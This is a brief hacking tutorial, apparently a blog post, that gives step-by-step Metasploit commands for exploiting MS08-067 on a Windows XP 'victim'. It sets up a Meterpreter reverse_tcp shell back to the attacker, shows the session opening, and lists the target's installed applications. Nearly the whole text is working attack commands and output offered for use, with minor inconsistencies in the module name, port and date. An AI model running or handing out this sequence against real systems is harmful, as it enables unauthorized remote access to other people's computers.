Show Victim’s Soft List

Follow this steps, to view your victim’s process list

#1) Open terminal & type:
assault@hackbook:~$ sudo msfconsole
*Inside msf console type*
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit (ms_08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
*The output will be: PAYLOAD => windows/meterpreter/reverse_tcp*

*Now, Set The Local Host – hacker’s local ip address*
msf exploit (ms_08_067_netapi) > set LHOST 192.168.50.15
*The output will be: LHOST => 192.168.50.15*

*Now, Set The Remote Host – target’s local ip address*
msf exploit (ms_08_067_netapi) > set RHOST 192.168.50.7
*The output will be: RHOST => 192.168.50.7*

*Now, Set The LPORT & RPORT*
msf exploit (ms_08_067_netapi) > set LPORT 4444
LPORT => 4444
msf exploit (ms_08_067_netapi) > set RPORT 445
RPORT => 445
msf exploit (ms_08_067_netapi) > show options
*Here we will get the whole details about our exploit process*

Now, let’s make it work. Let’s type:
msf exploit (ms_08_067_netapi) > exploit

*And you will get this output*
[*] Started reverse handler on 192.168.50.15:4444
[*] Automatically detecting the target…
[*] Fingerprinting: Windows XP – Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability …
[*] Sending stage (885806 bytes) to 192.168.50.7
[*] Meterpreter session 1 opened (192.168.50.15:444 -> 192.168.50.7:1045) at 2015-10.11 14:20:19 +0300

meterpreter >

 

Let’s type the command:
meterpreter > run get_application_list

 

ENJOY! 🙂

 

Here is an example by Gamer Forever